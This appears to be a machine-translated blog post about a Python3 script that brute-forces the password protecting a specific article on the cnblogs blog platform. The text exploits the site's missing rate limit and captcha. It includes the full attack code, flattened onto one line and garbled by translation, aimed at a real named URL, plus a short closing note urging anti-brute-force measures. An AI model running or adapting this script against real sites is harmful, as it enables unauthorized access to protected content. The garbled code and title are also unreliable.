Python3 implements brute force promotion of the password of the blog Park, while python3 does not

Python3 implements brute force promotion of the password of the blog Park, while python3 does not

I previously wanted to write a brute force password cracking tool for the vro. I only had a pole route in hand and found that the pole route had security restrictions and only allowed 10 consecutive password errors.

A function of a blog in the blog Park is to set a password for a blog post and enter the correct password to view the content of the article. After testing, we found that the password verification function has no verification code or the submission frequency limit,

Writing this brute force password cracking model for the blog garden is very simple and easy to implement.

For example, open this blog, will display a password input box: http://www.cnblogs.com/post/readauth? Url =/muer/archive/2011/11/27/factualism.html

I have never written such a program before, and I have never read the code for writing such a function. I will write a simple password cracking tool based on what I understand, instead of multithreading, not distributed,

This program has two parts:

1. I need a generator to continuously generate all possible combinations of passwords, such as generating a, B, c, aa, bb, cc, AB, ac... abc, CBA... abcd... and so on.

2. I need to keep submitting the password until I think the password is correct, record the password, and exit the program.

-_-! Why use a generator?

In python2, range () is not a generator. When range (N) and N are a large number,... python will explode !!! Haha ..

It takes too much time and effort to write a detailed blog. I will not write the specific analysis process here. I will directly go to the code later. If I cannot understand it, I can check the relevant keywords, after all, there are a lot of articles and content for basic tutorials.

Tqdm is a python progress bar library, and requests is a simple and elegant http library,

Product is a function in itertools, the standard library of python3. It can be generated (a, B, c ...) (c, B, ...) this sequence uses ''. join to get a password like "abc.

"Python3 brute force password: June 09, 2016 04:39:25 codegay" from time import strftimefrom itertools import productfrom time import sleepfrom tqdm import tqdmimport requestsfrom requests import post # Password generator def psgen (x = 4): iter = ['000000', 'abcdefghijklmnopqrstuvwxyz ', 'abcdefghijklmnopqrstuvwxyz',] for r in iter: for repeat in range (1, x + 1 ): for ps in product (r, repeat = repeat): yield ''. join (ps) def fx (url): # Set UR The readauth character in L is removed and replaced with the "http://www.cnblogs.com/muer/archive/2011/11/27/factualism.html" format, because this POST the destination address. Url = url. replace ("/post/readauth? Url = "," ") for ps in tqdm (psgen (6): try: rs = post (url, data = {'tb _ password': ps }, allow_redirects = 1) if rs. url = url: # If the returned url is in the form of "http://www.cnblogs.com/muer/archive/2011/11/27/factualism.html" after the password is submitted, the correct password is guessed. With open ("resut.csv", "a +") as f: f. write ('password cracking successful result:, '+ ps +', '+ strftime ("% c") +', '+ url +' \ n') break failed t: sleep (1) passurl = 'HTTP: // www.cnblogs.com/post/readauth? Url =/muer/archive/2011/11/27/factualism.html 'fx (url)

Finally, the program runs at a speed of about 6 times per second. I have been running for 30 hours, but it has only iterated several hundred thousand times. I have not been able to crack the password and have not produced any substantial harm.

Summary:

1. Add some measures to prevent brute-force cracking in the password verification area.

2. It is still necessary to use complex passwords to improve security. Although such a simple program is useless.